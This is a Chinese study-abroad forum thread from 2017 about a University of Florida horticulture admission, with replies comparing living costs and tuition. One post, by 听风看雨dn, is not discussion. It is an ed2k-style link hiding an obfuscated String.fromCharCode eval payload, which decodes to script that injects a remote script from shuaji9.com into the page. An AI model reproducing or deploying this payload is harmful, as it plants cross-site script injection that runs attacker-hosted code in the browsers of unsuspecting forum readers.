tasseltree 发表于 2017-3-28 14:17:20

UF园艺AD

邮箱一个月没有任何动静 今天又来了一个 攒人品 继续等 至今还没有一个完整的offer

影zi 发表于 2017-3-29 12:35:05

恭喜恭喜,有新的offer再来报

tasseltree 发表于 2017-3-29 19:59:16

影zi 发表于 2017-3-29 12:35 static/image/common/back.gif

嗯呢 谢谢谢谢~

LeaveLeaves 发表于 2017-3-29 20:47:00

UF很好啊,阳光沙滩比基尼妹子,还有便宜的物价

听风看雨dn 发表于 2017-3-29 21:47:56

ed2k://|file|filesize|'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'|8798/

tasseltree 发表于 2017-3-30 18:37:31

LeaveLeaves 发表于 2017-3-29 20:47 static/image/common/back.gif
UF很好啊,阳光沙滩比基尼妹子,还有便宜的物价

嗯是呢~ 然而像我们这种大夏天的蹲地里干活的专业得好好斟酌斟酌 哈哈
物价真的便宜吗?他们学校的小米说一年要5万刀 德州却只要约3万刀

tasseltree 发表于 2017-3-30 18:39:35

听风看雨dn 发表于 2017-3-29 21:47 static/image/common/back.gif

嗯呢 一定的 还在等梦校!

LeaveLeaves 发表于 2017-3-30 21:52:37

tasseltree 发表于 2017-3-30 18:37 static/image/common/back.gif
嗯是呢~ 然而像我们这种大夏天的蹲地里干活的专业得好好斟酌斟酌 哈哈
物价真的便宜吗?他们学校的小米说 ...

是只算生活费吗?只算生活费用不了那么多吧。。。房子一般也就三四百刀一个月

tasseltree 发表于 2017-3-30 22:16:26

LeaveLeaves 发表于 2017-3-30 21:52 static/image/common/back.gif
是只算生活费吗?只算生活费用不了那么多吧。。。房子一般也就三四百刀一个月

不是的 是生活费+学费总共

LeaveLeaves 发表于 2017-4-1 17:13:12

tasseltree 发表于 2017-3-30 22:16 static/image/common/back.gif
不是的 是生活费+学费总共

那估计是学费的差别了。。。甘村生活费自己做饭还是很实惠的

tasseltree 发表于 2017-4-2 07:53:26

LeaveLeaves 发表于 2017-4-1 17:13 static/image/common/back.gif
那估计是学费的差别了。。。甘村生活费自己做饭还是很实惠的

这样看来 各个学校学费差别还是挺大的。。毕竟我们专业的学校米有一个不在村里,,
页: [1]
查看完整版本: UF园艺AD